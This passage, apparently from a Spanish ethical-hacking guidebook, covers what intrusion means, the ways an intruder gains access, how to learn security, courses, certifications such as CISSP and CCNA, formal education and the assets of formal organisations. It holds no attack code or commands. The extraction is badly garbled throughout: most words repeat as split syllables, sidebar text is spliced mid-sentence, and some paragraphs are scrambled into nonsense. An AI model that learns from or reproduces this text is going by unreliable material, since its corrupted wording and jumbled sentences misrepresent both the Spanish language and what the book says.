La aplica aplicación ción Visio, Visio, del paque paquete te Offi Office ce de Micro Microsoft, soft, es muy utili utiliza zada da para pa ra plasmar plasmar de forma forma gráfi gráfica ca la dispo disposi sición ción de todos todos los compo componen nentes tes de un esce escena nario rio infor in formá máti tico. co. También También sirve sirve para para diagra diagrama mación ción lógi lógica ca y orga organi nigra gramas, mas, entre entre otros gráfi gráficos. cos. Visio.

Cono Co nocer cer técni técnicas cas bási básicas cas de intru intrusión sión “Cuando estás “Cuando estás empe empezan zando, do, no nece necesi sitas tas herra herramien mientas. tas. Ése es el modo mo do en que te vol verás  verás un script kiddie. kiddie. Lo que nece necesi sitas tas es enenten tender. der. Ne cesi sitas tassus saber saber có mo trares traba bajan jan losminis sis siste temas, mas, quépara erro res pueden pue den Nece cometer come ter procómo progra grama mado dores o admi ad nistra trado dores res paerrores ra que éstos és tos se vuel van  van vulne vulnera rables bles y cómo cómo esos errores errores pueden pueden ser exexplota plo tados dos de modo modo que se pueda pueda ingre ingresar sar en el siste sistema. ma. Una vez que entien entiendas das qué es lo que estás estás hacien haciendo, do, esta estarás rás prepara pa rado do para para elegir elegir la herra herramien mienta ta correc correcta ta para para la circuns circunstan tancia cia correc co rrecta. ta. Una vez que has elegi elegido do la herra herramien mienta, ta, ésta ésta sólo sólo hará hará tu proce proceso so más eficien eficiente”. te”. De Derek rek Fountain Fountain (En: Bugtraq) Bugtraq)  Antes  An tes de hablar hablar de estas estas técni técnicas, cas, debe debemos mos saber saber qué se entien entiende de por

intru in trusión sión.

Pa Para detener defi finir nirlo mo modo do simple, sim signifi signi ca lograr lograr el acce ac so trola. a recur rela.cursos sos delleun sis te--marasin te nerloladeauto auun tori riza zación ción deple, su dueño due ñofica o de quien loceso con contro Quien  ve siste a ca cabo este este tipo tipo de acce accesos sos no permi permititidos dos es lisa lisa y llana llanamen mente te un in como intru truso so, sea como 29

 

fue fuere re que lo cata catalo loguen guen los medios, medios, las auto autori rida dades des o el resto resto de la gente. gente.  Aunque  Aun que existen existen muchas muchas formas formas de intru intrusión, sión, aquí vere veremos mos ejemplos ejemplos del ámbi ámbito to ininformá for máti tico, co, es decir, decir, el ingre ingreso so de terce terceros ros no auto autori riza zados dos en la infor informa mación ción (alma (alma-cena ce nada da o en flujo) flujo) en es organi niza zación. ción. De todas todas mane maneras, ras, debe debe-esta tado do digi digital tal de una orga mos tener tener en cuenta cuenta que en el siste sistema ma de cualquier cualquier orga organi niza zación, ción, los datos datos vita vitales les suelen sue len estar estar en una amplia amplia gama gama de sopor soportes, tes, como como papel, papel, memo memorias rias di versas,  versas, cincintas, audio, audio, piza pizarras, rras, pane paneles, les, ondas ondas de radio, radio, video, video, diapo diaposi siti ti vas  vas y más. Varios Varios de eses-

tos medios medios son llama llamados dos fungi fungibles bles porque porque se agotan agotan con su uso, como como las cintas cintas o el papel. papel. El intru intruso so puede puede lograr lograr acce acceso so no auto autori riza zado do a infor informa mación ción de modo: modo: • • • • • •

Físi sico: co: in situ estando do frente frente a la máqui máquina. na. situ, estan Remo moto, to, local local o ambos ambos a la vez. Por ca cable: vía Inter Internet net o línea línea tele telefó fóni nica. ca. Por on ondas:  wi  wire reless less. Por ra radia diación: ción: ea ves  vesdrop dropping  ping . Por vi vista u oído: oído: a dis distan tancia  cia .

•• A . inter in terfaz faztegráfi grá ca mandos A ttrraa vés  vés de de una un in intér térpre prete defica  co coman dos. • A tra vés de un in intér térpre prete te de coman comandos dos a ciegas, ciegas, sin ver el resul resulta tado do de lo que se ejecu eje cutó tó en el ser vi  vidor dor remo remoto. to. Entrar no solo Entrar solo signi signifi fica ca intro introdu ducir cir el usuario usuario y la cla ve en un de deter termi mina nado do ser vicio  vicio de auten autenti tifi fica cación ción remo remota ta como como telnet, telnet, ssh, termi terminal nal ser vice,  vice, rlogin, rlogin, ftp, y todos todos aquellos aque llos que soli solici citen ten ingre ingresar sar vali valida dación. ción. Puede Puede signi signifi ficar car la reali realiza zación ción de una es es-cala ca lada  da , que consis consiste te en una suce sucesión sión de actos actos que lle van a lo lograr grar cada cada vez mayor mayor alcan al cance ce dentro dentro del siste sistema ma para, para, final finalmen mente, te, obte obtener ner una cuenta cuenta de ele va  vados dos pri vi vile legios gios oo ftp el propó pro pósi sito to quearchi ha im puesto to alelexte eje ejecu cutor. tor.agregar Porgar ejem ejemplo,  viar poremail determi deter mina nado do arse chi vo  haya voyao impues data da taba base se ex terior, rior, agre un plo, usuaen usuario rio de pripri  vile  vi legios gios en el siste sistema ma o, simple simplemen mente, te, entrar entrar y ocultar ocultar su rastro rastro para para que en el fufuturo tu ro se pueda pueda utili utilizar zar ese ser vi  vidor dor para para otros propó propósi sitos. tos. Esto Esto podría podría lle var meses meses o minu minutos, tos, y las más varia va riadas das técni técnicas, cas, ya sea a tra vés del mismo mismo siste sistema ma opera operati ti vo,  vo, de algu alguna na aplica aplicación ción o de algún algún descui descuido do del admi adminis nistra trador dor (habla (hablamos mos siempre siempre de ser vido  vidores res con admi adminis nistra trador dor y no de simples simples termi termina nales les de usuarios usuarios con Windows Windows XP). Sin dudas, dudas, un intru intruso so se apro ve  vecha chará rá de los descui descuidos dos huma humanos, nos, ya que todos todos los compo com ponen nentes tes del siste sistema ma fueron fueron desa desarro rrolla llados, dos, setea seteados dos u orga organi niza zados dos por perso perso-nas; por eso tienen tienen falen falencias cias que son poten potencial cialmen mente te explo explota tables. bles. Enton Entonces, ces, ¿cuál es la mejor mejor forma forma de aprender aprender técni técnicas cas de intru intrusión? sión? En princi principio, pio, cono conocer cer el obje obje-ti vo,  vo, em empe pezan zando do por el siste sistema ma opera operati ti vo  vo (con es esto to no hace hacemos mos refe referen rencia cia a elemen elemen-tos del tipo tipo Windows Windows 98, sino sino a Linux, Linux, la fami familia lia BSD y la fami familia lia Windows Windows Ser ver).  ver). 30

 

Los descui dos de admi adminis nistra tración ción son difí difíci ciles les de descu descubrir brir y explo explotar tar si no se cono conoce ce descuidos profun pro funda damen mente te el siste sistema ma opera operati ti vo  vo o la aplica aplicación ción en sí. Imagi Imagine nemos mos el tiempo tiempo que lle va  varía ría aprender, aprender, sobre sobre la marcha marcha de un chequeo, chequeo, las carac caracte terís rísti ticas cas de un siste sistema ma opeope-

rati vo rati  vo (y sus sus apli aplica cacio ciones) nes) o todos todos los compo componen nentes tes de un esce escena nario. rio. Hay que estar estar infor informa mado do acerca acerca de las nue vas vul descubrir brirlas las por  vulne nera rabi bili lida dades des o descu uno mismo mismo si se tiene tiene el tiempo tiempo para para hacer hacerlo, lo, siendo muy útil la habi habililidad dad de enencontrar con trarlas las y poder poder progra programar mar su ex (prueba ba de concep concepto). to). También También es bueno bueno exploit  ploit  (prue saber sa ber cómo cómo identi identifi ficar car un siste sistema ma y reco recono nocer cer si es poten potencial cialmen mente te explo explota table ble su mode mo delo, lo, versión versión o esta estado. do. Para Para ello, pode podemos mos recu recurrir rrir a los incon inconta tables bles libros libros y   white  whi tepa papers, pers, honey honeypots, pots, warga wargames, mes, concur concursos, sos, listas listas de correo correo profe profesio siona nales, les, e-zie-zines y foros foros serios. serios. Además Además pode podemos mos montar montar una red hoga hogare reña ña para para practi practicar, car, mámáquinas qui nas virtua virtuales les en Vm Vmwa ware  re o hacer hacerlo lo en el traba trabajo jo si es posi posible. ble.

IP.

Hide-Ip-Brow Hi de-Ip-Browser ser (www.hi (www.hide-ip-brow de-ip-browser ser.com) .com) es un software softwa re que permi permite te mante mantener ner el anoni anonima mato to al nave navegar gar sitios sitios y al postear postear en foros. foros. Esto Esto lo reali realiza za median mediante te la elección elección de dife diferen rentes tes servi servido dores res proxys.

Sobre los cursos Sobre cursos que se ofrecen ofrecen en Inter Internet, net, ya sean de segu seguri ridad dad o de ethi ethical cal hachacking, hay que tener tener en cuenta cuenta que por estos estos días, la Web es masi masi va  va y hay muchos mu chos

Listas de Correo

En estas listas listas de correo correo nos ayuda ayudarán rán a encontrar respues respuestas tas a nuestras nuestras pregun preguntas: tas: www.se www .segu-in gu-info fo.co .com.ar, m.ar, en espa español ñol (foro (forosi); si); www.is www.issaar saarba.org, ba.org, en espa español ñol (ISSAAr (ISSAArBA); BA); www.se www .secu curity rityfo focus cus.com, .com, en inglés inglés (Bugtraq (Bugtraq/Se /Secu curity rity Basics); Basics); www.in www.info fosec secnew news. s. org, en inglés inglés (ISN); www.e www.elis listas tas.ne .net/lis t/lista/nnl, ta/nnl, en espa español ñol (NNL Newslet Newsletter). ter).

31

 

empresa empre sarios rios que brindan brindan dudo dudosos sos cursos cursos (obso (obsole letos tos o incom incomple pletos) tos) para para así aproapro vechar  ve charse se de la igno ignoran rancia cia de la gente gente y ganar ganar dine dinero. ro. Esto no significa que todos todos los cursos cursos son malos, malos, pero pero en gran parte parte son una pérdi pérdida da de recur recursos. sos. Para Para no cocorrer riesgos, riesgos, es bueno bueno tomar tomar estos estos recau recaudos: dos: Dentro tro de una lista lista de correo correo de segu seguri ridad, dad, pregun preguntar tar a los profe profesio siona nales les cuál sese1. Den ría el curso curso adecua adecuado do según según nuestro nuestro ni vel,  vel, inte interés, rés, fin o recur recursos sos econó económi micos. cos. Evaluar, luar, tras haber haber habla hablado do con alguien alguien que haya haya cursa cursado do allí, cuáles cuáles fueron fueron los 2. Eva costos cos tos tota totales, les, las horas, horas, el alcan alcance, ce, si tienen tienen progra programa ma o entre entregan gan mate material rial de esestudio, tu dio, cuál es el segui seguimien miento to del aprendi aprendiza zaje, je, qué clase clase de títu título lo o certi certifi fica cado do enentregan tre gan al fina finalilizar zar y qué reco recono noci cimien miento to tiene tiene éste éste en el merca mercado do labo laboral ral local local o mundial. mun dial. También También sería sería bueno bueno saber saber si la perso persona na que nos infor informa ma quedó quedó conconforme for me y en qué aspec aspectos tos el curso curso fue flojo, flojo, o no se cumplió cumplió con lo prome prometi tido. do. Compro probar bar la expe experien riencia cia real en segu seguri ridad dad de quien o quienes quienes impar imparten ten el curcur3. Com so o el progra programa ma de estu estudio dio que está está por pagar pagarse. se. No está está mal pedir pedir refe referen rencias cias o currí currícu culum lum vitae, vitae, y en lo posi posible ble con vie  viene ne hacer hacerlo lo de modo modo formal, formal, por telé telé-fono fo no o en la ofici oficina na misma. misma.

Educa Edu cación ción formal formal Hoy en día, no existe existe una carre carrera ra de grado grado formal formal de ni vel  vel uni versi  versita tario rio (de varios varios años de dura duración) ción) sobre sobre segu seguri ridad dad infor informá máti tica ca que compren comprenda, da, en su conte conteni nido, do, al ethi ethical cal hacking hac king de modo modo prácti práctico co ( hands hands on ). Ape Apenas nas hay algu algunos nos postgra postgrados, dos, certi certifi fica cacio ciones nes y tecni tecnica catu turas ras rela relacio ciona nadas. das. Sí hay carre carreras ras como como analis analista ta de siste sistemas, mas, inge ingenie niería ría en sissiste temas, mas, liforma cencia ciatu tura ra en sis doc tora rados, dos,Allí especia espe zacio ciones nes y maestrías, maes trías,compren queprensonbuenos bue nos licen for mado dores res de siste batemas, base semas, para pa ra docto la mate ma teria. ria. seciali esliza estu tudian dian las tecno tec nolo logías gías com didas di das en los siste sistemas, mas, proto protoco colos, los, sus proce procedi dimien mientos, tos, técni técnicas, cas, dise diseño ño y orga organi niza zación. ción. El estu estudio dio formal, formal, de algu alguna na mane manera, ra, mode modela lará rá todo todo lo que aprenda aprendamos mos de mane mane-ra auto autodi didac dacta, ta, y no sólo sólo en rela relación ción con los conte conteni nidos dos de las mate materias, rias, sino sino tamtambién porque porque enfren enfrentar tarnos nos a nume numero rosos sos exáme exámenes nes escri escritos tos y orales orales nos dará dará cierto cierto temple tem ple ante ante peque pequeños ños desa desafíos fíos reales, reales, de reso resolu lución ción analí analíti tica. ca.

Lect Le ctur uras as ad adic icio iona nale les s

Es reco recomen menda dable ble leer libros libros de Auerbach, Auerbach, la serie serie Hacking Hacking Expo Exposed, sed, de McGraw-Hill, McGraw-Hill, de Sybex, Sybex, de O’Reilly, de CRC Press, de Syngress, Syn gress, de Actual Actualtests, tests, de Learnkey, Learnkey, todos todos los de temá temáti tica ca CISSP, los 31 ejempla ejemplares res de Hackxcrack Hackxcrack y hackin9. hackin9. Además, Además, es inte intere re-sante san te ver: www www.zip .zipsi sites tes.ru .ru/book /books/e s/edoc docs/e s/edocs docs_li _list. st.php php y www.in www.inse secu cure remag mag.com .com

32

 

Como si fuera Como fuera poco, poco, también se obtie obtienen nen otros puntos puntos de vista vista que servirán papara abordar abordar proble problemas, mas, se cono conocen cen cole colegas gas que en algu al gunos nos aspec aspectos tos pueden pueden ser más expe experi rimen menta tados, dos, se practi practica ca en labo labora rato torios rios o entor entornos nos de red, se forman for man contac con tactos tos de traba trabajo jo y estu estudio, dio, se escu escuchan chan anécdo anécdotas tas y expe experien riencias cias muy valio valio-sas por parte parte de profe profeso sores res o compa compañe ñeros, ros, entre otras cosas. La educa educación ción formal formal es muy teni tenida da en cuenta cuenta por las consul consulto toras ras de RRHH gragracias al tí brinda. Muchos Muchos auto autodi didac dactas tas han sido sido recha rechaza zados dos por no popotítu tulo lo que brinda. seer títu título lo algu alguno, no, sin siquiera tener tener la posi posibi bililidad dad de demos demostrar trar sus habi habililida dades des aun siendo siendo exce excelen lentes tes pen analistas. tas. pentes testers ters y analis En cuanto cuanto a las cer como pode podemos mos ver certi tifi fica cacio ciones nes de segu seguri ridad  dad , hay más de 20, como en http Algu-http://cer ://certi tifi fica catio tion.a n.about bout.co .com/od m/od/se /secu curity ritycert certs/a/sec s/a/seccer certes tessentls.htm sentls.htm. Algu nas son consi conside dera radas das como como requi requisi sitos tos en deter determi mina nadas das orga organi niza zacio ciones nes por su dedeparta par tamen mento to de recur recursos sos huma humanos, nos, pero pero como como todo todo títu título, lo, pueden pueden no ser el verda verda-dero de ro refle reflejo jo de la capa capaci cidad dad y prepa prepara ración ción de quien lo posee. posee.

(ISC)2 (ISC )2 es re reco cono noci cida da en todo todo el mundo mundo por certi cer tifi ficar car profe profesio siona nales les CISSP. Funda Fundada da en 1989, pasa pasaron ron por sus exáme exámenes nes más de 50.000 profe profesio siona nales. les. Su direc dirección ción es www.is www.isc2.org. c2.org. ISC.

En la prepa prepara ración ción de estos estos exáme exámenes, nes, suelen suelen aprender aprenderse se cosas cosas inte intere resan santes tes o total totalmen men-te desco descono noci cidas, das, y es reco recomen menda dable ble que todo todo aquel inte intere resa sado do en sumar sumar expe experien riencias cias

Ejercic Ejerci cio ios s de de pro rogr gra ama maci ció ón En http://com http://commu munity nity.co .corest rest.com .com/~ge /~gera/In ra/Inse secu cure rePro Program gramming, ming, pode podemos mos encon encontrar trar ejerci ejer cicios cios de progra programa mación ción avanza avanzada da rela relacio ciona nada da a fallas. fallas. Esto Esto es útil ya que, cuanto cuanto más practi practique quemos mos (progra (programe memos), mos), me jor se serán rán nuestras nuestras habi habili lida dades des para para resol resolver ver

proble pro blemas mas median mediante te progra programa mación. ción.

33

 

en se segu guri ridad dad tome tome estos estos exáme exámenes nes de certi certifi fica cación ción por una cuestión cuestión formal. formal. Esto Esto le permi per miti tirá rá ser un mejor mejor candi candida dato to en las selec seleccio ciones nes de los depar departa tamen mentos tos de recur recursos sos huma hu manos. nos.  A con conti tinua nuación, ción, pode podemos mos leer parte parte de las decla declara racio ciones nes de Iván Arce Arce (CTO de Core Co re Secu Security rity Techno Technolo logies) gies) acerca acerca de la forma formación ción del profe profesio sional nal de segu seguri ridad, dad, y  más preci precisa samen mente te sobre sobre las certi certifi fica cacio ciones nes de segu seguri ridad. dad. La entre entre vis  vista ta comple completa ta se puede pue de leer en  ww w.a (Gracias cias  w.aci cis.org s.org.co .co/fi /filead leadmin min/Re /Re vis  vista_96/en ta_96/entre tre vis  vista.pdf  ta.pdf  (Gra Iván por auto autori rizar zar su repro reproduc ducción). ción).

- ¿Cómo ¿Cómo se mane mane jan las cer certi tifi fica cacio ciones, nes, cuál es su alcan alcance ce y aplica aplicabi bili lidad dad real en las empre empresas? sas? Difícil Difí cilmen mente, te, una certi certifi fica cación ción de segu seguri ridad dad es un indi indica cati ti vo  vo de la ca capa paci cidad, dad, expe ex perien riencia cia o cono conoci cimien miento to real de un indi indi viduo  viduo en la mate materia. ria. A lo sumo, sumo, es un indi indica cati ti vo  vo de la exis existen tencia cia de algún algún tipo tipo de forma formación ción bási básica ca en el tema, tema, sisiguiendo guien do la pauta pauta del progra programa ma parti particu cular lar que puede puede ser malo, malo, medio mediocre cre o memediana dia namen mente te bueno. bueno. Un exper experto to en segu seguri ridad dad infor informá máti tica ca no se forma forma como como resul resulta tado do de la acumu acumu-lación la ción de cursos cursos y certi certifi fica cacio ciones, nes, sino sino de la acumu acumula lación ción y la aplica aplicación ción de una  disci dis cipli plina na de traba traba jo y de estu es tudio dio adqui adquiri rida da en otro contex contexto to -escue -escuela, la, uni ver versidad, si dad, traba traba jo, casa, casa, etc.-, combi combina nada da con las capa capaci cida dades des creati creati vas,  vas, de inno in no va  va-ción, perse perse ve  veran rancia cia y adapta adaptación, ción, propias propias de cada cada indi indi viduo.  viduo. No obstan obstante, te, eso no impi impide de que las certi certifi fica cacio ciones nes se adopten adopten y se usen como como un indi indica cador dor de capa capaci cidad dad profe profesio sional nal y princi principal palmen mente te como como un meca mecanis nismo mo del merca mercado do labo laboral ral y de capa capaci cita tación ción profe profesio sional, nal, para para esta estable blecer cer jerar jerarquías, quías, ni veles  veles sala salaria riales, les, planes planes de capa capaci cita tación ción y justi justifi ficar car di versos  versos tipos tipos de deci decisio sio-nes y pro yec  yectos. tos. Es muy impor importan tante te que en el méto método do formal formal de estu estudio dio no se estu estudie die memo memori ri-zando zan do los conte conteni nidos dos sin llegar a compren comprender derlos, los, ya que en el momen mo mento to de enenfrentar fren tar la proble problemá máti tica, ca, esto esto compli complica cará rá realmen realmente te las cosas. cosas. En el traba trabajo, jo, esto esto es impor importan tante te porque porque no se puede puede estar estar googlean googleando do en meme-

Có  mo sa Có sa  ber qué carrera elegir Consultan Consul tando do a profe profesio siona nales les en listas listas y dándo dándoles les deta detalles. lles. Por Ej., si alguien alguien desea desea dedi dedi-carse car se al cifra cifrado do de datos, datos, es proba probable ble que le reco recomien mienden den una licen licencia ciatu tura ra en mate matemá máti ti-cas. A quien desea desea dedi dedicar carse se a escri escribir bir proce procedi dimien mientos tos o norma normati tivas, vas, le dirán dirán que estu estudie die Analis Ana lista ta de siste sistemas mas de infor informa mación, ción, que posee posee mate materias rias como como Orga Organi niza zación ción y méto métodos. dos.

34

 

dio de una intru in trusión sión de terce terceros ros en algún algún compo componen nente te del siste sistema ma de la orga or gani ni-zación za ción o en medio me dio de una reunión reunión ejecu ejecuti ti va.  va. En un exa examen, men, porque porque los profe profe-sores so res se darán da rán cuenta cuenta de que se está es tá reci recitan tando do un conte conteni nido do de memo memoria, ria, ya que tienen expe tienen experien riencia cia en escu escuchar char alumnos alumnos o leer sus textos textos año tras año, y es un gra ve erro errorr su s ubes besti timar mar a un profe profesor sor de esa mane ma nera. ra.

Universia Univer sia (www.u (www.uni niver versia sia.co .com.ar) m.ar) es el busca buscador dor más cono conoci cido do de carre carreras ras onli online, ne, a distan distancia cia o presen presencia ciales les de nivel nivel univer universi sita tario rio o tercia terciario rio en toda toda Lati Latinoa noamé méri rica. ca.

Buscador.

CCNA  

Significa Cisco Cisco Certi Certified fied Network Network Asso Associa ciated ted y es una una cer certi tifi fica caci ción ón de Cis Cisco co rela relacio ciona na-da a networ networking. king. Los conte conteni nidos dos están están rela relacio ciona nados dos con los mode modelos los OSI y TCP-IP, caca bleado blea do estruc estructu tura rado do bási básico, co, enru enruta tamien miento, to, confi configu gura ración ción de routers, routers, switching, switching, confi confi-gura gu ración ción de switches, switches, VLAN, y tecno tecnolo logías gías WAN. Más infor informa mación ción en www.cis www.cisco co.com .com

35

 

Traba ba jo & prác prácti tica ca Tra Nadie Na die nace nace sabien sabiendo, do, la prácti práctica ca hace hace al maestro. maestro.  Anóni  Anó nimo mo

Mediante Median te prácti práctica ca y traba trabajo jo se va adqui adquirien riendo do expe experien riencia cia real y cono conoci cimien miento to sobre el tema. tema. Se logran logran y mejo mejoran ran las meto metodo dolo logías gías propias propias de traba trabajo, jo, se cono conocen cen nue vas fuentes, fuentes, tecno tecnolo logías gías y mane maneras ras de abordar abordar un desa desafío. fío. No se puede puede compa compa-rar a alguien alguien que cono conoce ce algo algo por haber haberlo lo enfren enfrenta tado, do, con alguien alguien a quien sólo sólo se lo han expli explica cado do o que lo leyó. leyó. Esto Esto es así porque porque de la teoría teoría a la prácti práctica ca hay alalgo que se llama llama rea ésta suele suele transfor transformar mar los resul resulta tados dos espe espera rados. dos. reali lidad  dad , y ésta

Trabajo. El sitio sitio www.jor www.jorna nadas dastra traba ba joit  joit.co .com.ar m.ar

se dedi dedica ca a reunir reunir jóve jóvenes nes postu postulan lantes tes para para algún algún traba traba jo o proyec proyecto to IT y poner ponerlos los en contac contacto to con reclu recluta tado dores res de las me jo  jores res firmas. firmas.

Lectura recomendada

Para obte Para obtener ner más cono conoci cimien mientos tos acerca de las orga organi niza zacio ciones, nes, es reco recomen menda dable ble leer el exce excelen lente te libro libro Técni Técnicas cas de orga organi niza zación, ción, siste sistemas mas y méto métodos, dos, de Alber Alberto to R. Lardent Lardent (old school de la organización) y Claves para el desarrollo de la empresa, de Fernando Grosso, más ligado a las e-organizaciones de hoy en día y las nuevas prácticas.

36

 

tener en cuenta Hay que tener cuenta que no sólo sólo por hacer hacer un curso curso de hacker hacker se es hacker, hacker, ni por rendir rendir una certi certifi fica cación ción de segu seguri ridad dad o porque porque nos asignen asignen un traba trabajo jo de chechequeo de segu seguri ridad dad se es un profe profesio sional. nal. El sacri sacrifi ficio cio de llegar llegar a ser un profe profesio sional nal es realmen realmente te alto, alto, y las conse consecuen cuencias cias que pade padecen cen las orga organi niza zacio ciones nes por no dar con uno acorde acorde a la situa situación, ción, no son tan buenas. buenas. De allí la gran impor im portan tancia cia que tiene tie ne el reclu recluta tamien miento to de los profe profesio siona nales les por parte parte de la orga organi niza zación. ción.

ORGA OR GANI NIZA ZACIO CIONES NES FORMA FORMALES LES El hacking hacking ético ético se ha conver converti tido do en una herra herramien mienta ta para para formu formular  lar  un reco recono noci cimien miento to de las vulne vulnera rabi bili lida dades des que re pre  presen sentan tan una ameamenaza na za a los acti activos. vos. El testea testeador dor está está actuan actuando do como como amena amenaza za (hac(hacker), en busca busca de las vulne vulnera rabi bili lida dades des que permi permiti tirán rán la ex po  posi sición ción de un acti activo, vo, como como ser: núme números ros de tar jeta  jeta de crédi crédito. to. Al hacer hacer eso, la prueba prueba tiene tiene el poten potencial cial de reve revelar lar los elemen elementos tos funda fundamen menta tales  les  nece ne cesa sarios rios para para crear una medi medida da com pren  prensi siva va y así em plear se gu  guri ri-dad a través través de una or gani  ganiza zación. ción.  James  Ja mes S. Tiller Tiller

Las llama llamadas das or orga gani niza zacio ciones nes forma formales les, tal como como nos ense enseñan ñan en la teoría teoría acadé académi mi-ca de cualquier cualquier carre carrera ra orienta orientada da a siste sistemas, mas, son aquellas aquellas empre empresas sas que persi persiguen guen un obje objeti ti vo  vo a tra vés de proce procesos sos admi adminis nistra trati ti vos,  vos, gestión gestión de infor informa mación ción y produc produc-ción de elemen elementos tos o ser vi  vicios cios para para colo colocar car en un merca mercado do sobre sobre deter determi mina nado do concontexto, tex to, siempre siempre de modo modo legal legal y coordi coordina nado. do. El común común de la gente gente suele suele llamar llamarlas las grandes grandes empre empresas, sas, corpo corpora racio ciones nes o insti institu tucio cio-nes, y en este este aparta apartado do enuncia enunciare remos mos algu algunos nos de sus aspec aspectos tos principales para para dar una noción noción muy bási básica ca de ellas, siempre siempre que tengan tengan una rela relación ción o inte interac racción ción con el uso de ethi ethical cal hacking, hacking, ya que éste éste es emplea empleado do en orga organi niza zacio ciones nes forma formales. les. EsEstas orga organi niza zacio ciones nes poseen, poseen, entre entre otras cosas: cosas:

Postularse para entrevistas de trabajo En las siguientes direcciones: www.universobit.com, trabajoensistemas.com.ar, empleos.clarin.com, bumeran.com.ar, www.zonajobs.com.ar, www.computrabajo.com .ar, issaarba.blogspot.com (ver listado de consultoras) y www.tecnoempleo.com

37

 

• Dife feren rentes tes áreas: opera operati ti vas,  vas, admi adminis nistra trati ti vas/e  vas/eje jecu cuti ti vas  vas y geren ge rencia ciales. les. • Un ffllujo de datos datos e infor informa mación ción vital vital y, por tanto, tanto, también también un alma almace cena namien miento to de éstos éstos y un proce procesa samien miento. to. • Recur cursos sos huma humanos, nos, técni técnicos cos y lógi lógicos. cos. • Respon ponsa sables. bles. • Proce cesos. sos. • Estruc tructu turas ras jerár jerárqui quicas cas suje sujetas tas a secto sectores res y depen dependen dencias cias (mirán (mirándo dolo lo en un orga orga-nigra ni grama, ma, desde desde arriba arriba hacia hacia abajo abajo irán órde órdenes, nes, y de abajo abajo hacia hacia arriba arriba irá infor infor-mación ma ción de resul resulta tados). dos).

Jerarquias. Or Orga gani nigra grama ma de ejemplo. ejemplo. Estos Estos defi definen nen la estruc estructu tura ra

orga or gani niza zati tiva va y están están tipi tipifi fica cados dos ba jo una norma nor ma IRAM. Puede Puede hacer hacerse se por proce procesos, sos, depar departa tamen mentos tos o secto sectores, res, jerar jerarquías quías y produc productos. tos.

Estas orga Estas organi niza zacio ciones, nes, dentro dentro de lo que es su sis siste tema  ma (lla (llama mado do vulgar vulgarmen mente te esce escena nario) rio) e inte integri gridad dad físi física ca total, total, poseen poseen elemen elementos tos vita vitales les llama llamados dos ac acti ti vos  vos, como como lo es la in in-forma for mación ción sensi sensible ble o críti crítica  ca . Los acti acti vos  vos son son muy muy varia variados dos y deben deben clasi clasifi ficar carse se tanto tanto en tipo tipo o núme número ro como como en impor importan tancia cia (criti (critici cidad), dad), aunque aunque sólo sólo hare haremos mos foco foco en el más impor importan tante. te. Para Para eso, prime primero ro debe debemos mos compren comprender der que no es lo mismo mismo hablar hablar de datos datos que de infor informa mación, ción, ya que ésta ésta últi última ma tiene tiene una impor importan tancia cia signi signifi fica cati ti va  va pa pa-ra la empre empresa. sa. Por ejemplo, ejemplo, como como infor informa mación ción sensi sensible ble o críti crítica ca pode podemos mos mencio mencionar: nar: • El lilista tado do de clientes clientes con todos todos sus datos. datos. 38

 

• • • • • • • • •

Lista tado do de pro vee  veedo dores, res, compra comprado dores, res, socios. socios. Cla ves o con contra trase señas. ñas. Ubica cación ción de puntos puntos de acce acceso so pri vados.  vados. Planos. Infor forma mación ción crít crítica o confi confiden dencial cial de trat tratados, nego negocia ciados, dos, reunio reuniones, nes, pautas, pautas, pactos. pactos. Combi bina nacio ciones nes de cajas cajas fuertes. fuertes. Agendas, ruti rutinas nas de hora horario, rio, proce procesos. sos. In ven  venta tarios, rios, plani planillas llas de venta, venta, compra compra y stocks. Lista tado do de identi identida dades des de agentes. agentes.

• Infor forma mación: ción: perso personal, nal, catá catálo logos gos de produc productos tos futu futuros, ros, costos, costos, esta estadís dísti ticas, cas, sonsondeos de merca mercado, do, balan balances ces pri vados,  vados, resul resulta tados, dos, dise diseños, ños, resul resulta tados dos de análi análisis, sis, estra es trate tegias, gias, parti partici cipa pacio ciones, nes, accio acciones, nes, mate materia riales, les, fórmu fórmulas las de produc productos, tos, ecuaecuaciones, cio nes, graba grabacio ciones nes digi digita tales, les, tesis, tesis, fotos fotos y films pri vados,  vados, in ves  vesti tiga gacio ciones, nes, nómi nómi--

nas de pago, pago, entre entre otras tantas tantas cosas cosas impor importan tantes. tes. Podemos Pode mos imagi imaginar nar muchas muchas situa situacio ciones nes que pueden pueden atentar atentar contra contra estos estos acti acti vos  vos de la empre em presa. sa. Por ejemplo, ejemplo, que un intru intruso so o mal ware  ware tenga tenga acce acceso so a ellos, que los alte alteren ren o los borren borren para para siempre siempre o que los entre entreguen guen a la compe competen tencia cia o al mejor mejor postor. postor.  También  Tam bién existe existe una enorme enorme canti cantidad dad de amena amenazas zas natu natura rales, les, técni técnicas cas y huma humanas nas (co(como un emplea empleado do desleal desleal que la roba roba o copia, copia, por ejemplo) ejemplo) que podrían podrían atentar atentar contra contra ellos. Lógi Lógica camen mente, te, en estos estos tiempos tiempos de alta alta compe competi titi ti vidad,  vidad, el impac impacto to nega negati ti vo  vo sería sería muy grande. grande. De todas todas mane maneras, ras, debe debemos mos recor recordar dar que la infor informa mación ción críti crítica ca es tan solo so lo uno de los acti acti vos  vos que hay que pro prote teger, ger, de los tantos tantos presen presentes tes en una orga organi ni-zación. za ción.  Actual  Ac tualmen mente, te, las orga organi niza zacio ciones nes nece necesi sitan tan segu seguri ridad dad a tra vés de la incre incremen menta tación ción de la cali calidad dad en sus proce procesos sos y el resguar resguardo do de sus compo componen nentes tes (acti (acti vos),  vos), a tra vés de están estánda dares, res, normas, normas, polí políti ticas, cas, contro controles, les, segui seguimien miento to y la mejo mejora ra conti continua nua de éséstos. Para Para ello se practi practican can au audi dito torias rias de segu seguri ridad dad IT, re rele le va  vamien mientos tos ex exhaus hausti ti vos,  vos, y re vi  visio siones nes de los proce procesos, sos, funcio funciones nes y tareas tareas rela relacio ciona nadas das con las buenas buenas prácprácticas ti cas en segu seguri ridad. dad. Todo Todo ello hace hace a la ges gestión tión de la segu seguri ridad dad de la infor informa mación ción, como co mo vere veremos mos en el capí capítu tulo lo 9, que explica en un punto el tema norma nor mati ti vas.  vas. No hay que confun con fundir dir la gestión gestión de la segu se guri ridad dad de la infor informa mación ción con la se segu gu--

